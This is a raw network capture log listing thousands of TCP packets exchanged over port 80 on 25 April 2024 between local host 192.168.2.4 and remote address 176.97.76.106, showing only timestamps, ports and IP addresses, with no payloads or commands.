Apr 25, 2024 09:04:02.052316904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052342892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052369118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052378893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052421093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052467108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052489996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052511930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052519083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052573919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052588940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052601099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052612066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052623987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052647114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052647114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052711964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052723885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052753925 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052783966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052795887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052808046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052838087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052850962 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052859068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052870989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052900076 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.052948952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052963018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052983999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.052995920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053008080 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053037882 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053037882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053082943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053095102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053134918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053145885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053180933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053200006 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053231001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053241968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053252935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053272963 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053303957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053320885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053381920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053394079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053405046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053433895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053436995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053450108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053483009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053483009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053493977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053520918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053570032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053594112 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053654909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053668022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053678989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053689957 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053689957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053711891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053714037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053751945 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053760052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053833008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053844929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053880930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053913116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053913116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.053931952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053945065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.053976059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054009914 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054029942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054078102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054097891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054111004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054135084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054135084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054277897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054335117 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054366112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054378033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054389000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054430962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054439068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054455042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054477930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054502964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054538965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054559946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054642916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054677963 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054717064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054765940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054806948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054811001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054850101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054903030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.054940939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.054960012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055001020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055037022 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055039883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055061102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055075884 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055095911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055150986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055191994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055195093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055238962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055250883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055253029 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055263996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055284977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055311918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055329084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055371046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055414915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055428982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055478096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055478096 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055500984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055519104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055541992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055586100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055603981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055655956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055747032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055752039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055788040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055833101 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055835009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055864096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055936098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055948019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.055993080 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.055994034 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056055069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056066036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056077003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056106091 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056127071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056149006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056178093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056191921 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056212902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056256056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056269884 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056281090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056327105 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056334019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056387901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056415081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056492090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056545973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056551933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056622028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056691885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056695938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056747913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056777000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056804895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056823015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056843996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056850910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056855917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056902885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.056906939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056969881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.056982040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057010889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057012081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057074070 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057082891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057123899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057135105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057146072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057162046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057178020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057224989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057238102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057282925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057312012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057312012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057362080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057374001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057420015 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057420015 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057420969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057452917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057570934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057583094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057601929 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057624102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057667017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057679892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057704926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057723045 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057729006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057775021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057796001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057807922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057842016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057888031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057929039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057940960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057951927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.057972908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.057996035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058012009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058058023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058115005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058147907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058166981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058197975 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058212996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058234930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058273077 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058295965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058340073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058386087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058396101 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058454990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058468103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058510065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058510065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058522940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058545113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058552980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058587074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058588982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058661938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058674097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058701038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058713913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058725119 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058737040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058763027 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058763027 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058784962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058826923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058839083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058901072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058912039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058923006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.058938980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.058944941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059011936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059031963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059113026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059124947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059150934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059201002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059221983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059252977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059325933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059365988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059385061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059427023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059465885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059475899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059530973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059561968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059578896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059597015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059619904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059669018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059685946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059699059 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059708118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059772015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059848070 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059849024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059860945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059873104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059916973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059927940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.059947014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059947014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.059968948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060044050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060055971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060076952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060115099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060137033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060192108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060318947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060324907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060331106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060363054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060374975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060394049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060420990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060424089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060482025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060528994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060534954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060615063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060652971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060673952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060695887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060731888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060754061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060808897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060848951 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060928106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060967922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.060985088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.060992002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061019897 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061019897 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061081886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061100006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061110020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061134100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061135054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061135054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061146975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061166048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061203003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061209917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061223030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061244011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061245918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061275005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061275005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061295986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061309099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061340094 CEST	80	49733	176.97.76.106	192.168.2.4
